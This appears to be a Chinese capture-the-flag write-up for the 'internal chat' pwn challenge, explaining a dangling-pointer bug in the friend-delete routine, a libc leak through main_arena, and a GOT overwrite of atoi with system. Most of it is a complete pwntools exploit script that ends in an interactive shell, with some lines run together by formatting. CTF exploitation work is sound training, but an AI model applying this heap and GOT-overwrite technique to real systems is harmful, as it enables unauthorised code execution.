internal chat圣诞欢乐赛

internal chat

拿到题目开启的保护为

很容易联想到覆写got表来getshell

首先给注册一个用户，用户的结构体如下

struct user
{char *user_name;__int64 age;char description[0x100];_QWORD *addr;_QWORD *friend_addr;__int64  flag;//判断该用户是否被删除
}

漏洞点在于add_delete部分，当删除用户结构体时指针没有置0，产生空指针。且flag指针会被下一个chunk的pre_size覆盖。造成指针始终有值的情况

leak_libc

我们首先删除用户，show处没有判断，打印用户的信息，获取libc地址。

覆写atoi地址

再注册一个用户，设置用户的名称大小为0x128，这样名称地址即为一个用户的地址，将atoi的got表地址写再name地址上，再通过泄露的libc地址，获取atoi地址，登陆被删除的第一个用户。再修改name，可以修改got表内容为system即可getshell

exp

from pwn import *
from LibcSearcher import *
context.log_level='debug'
p=process('./InternalChatSystem')
elf=ELF('./InternalChatSystem')
def debug(addr):gdb.attach(p,"b *"+str(addr))
def register(name_size,name,age,payload):p.recvuntil("Your choice:")p.sendline("2")p.recvuntil("Input your name size:")p.sendline(str(name_size))p.recvuntil("Input your name:")p.sendline(name)p.recvuntil("Input your age:")p.sendline(str(age))p.recvuntil("Input your description:")#description<=0x100p.sendline(payload)
def login(name):p.recvuntil("Your choice:")p.sendline("1")p.recvuntil("Please input your user name:")p.sendline(name)
def send_message(name,title,content):p.recvuntil("Your choice:")p.sendline('4')p.recvuntil("Which user do you want to send a msg to:")p.sendline(name)p.recvuntil("Input your message title:")p.send(title)p.recvuntil("Input your content:")p.send(content)
def delete(name):p.recvuntil("Your choice:")p.sendline("3")p.recvuntil("Input the friend's name:")p.sendline(name)p.recvuntil("So..Do u want to add or delete this friend?(a/d)")p.sendline("d")
def add(name):p.recvuntil("Your choice:")p.sendline("3")p.recvuntil("Input the friend's name:")p.sendline(name)p.recvuntil("So..Do u want to add or delete this friend?(a/d)")p.sendline("a")
def show():p.recvuntil("Your choice:")p.sendline("1")
def out():p.recvuntil("Your choice:")p.sendline("6")
def change(name,age,description):p.recvuntil("Your choice:")p.send("2")p.recvuntil("Input your name:")p.send(name)p.recvuntil("Input your age:")p.send(str(age))p.recvuntil("Input your description:")p.send(description)register(0x60,'aaaaaa',30,'1'*0x16)
login('aaaaaa')
send_message('aaaaaa','\x01'*32,'\x02'*32)
add('aaaaaa')
#debug(0x400f51)
delete("aaaaaa")
#debug(0)
show()
p.recvuntil("Age:")
main_arena=int(p.recv(12),16)-88
malloc_hook=main_arena-0x10
print hex(main_arena)libc=LibcSearcher('__malloc_hook',malloc_hook)
libc_base=malloc_hook-libc.dump('__malloc_hook')
atoi_addr=libc_base+libc.dump('atoi')
system_addr=libc_base+libc.dump('system')
#0choiceprint hex(atoi_addr)
print hex(elf.got['atoi'])
out()
register(0x128,p64(elf.got['atoi']),30,'1'*4)
login(p64(atoi_addr))
change(p64(system_addr),18,'a')
p.recvuntil("Your choice:")
p.send('/bin/sh')
p.recvuntil("Your choice:")
p.sendline('/bin/sh')
p.interactive()

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！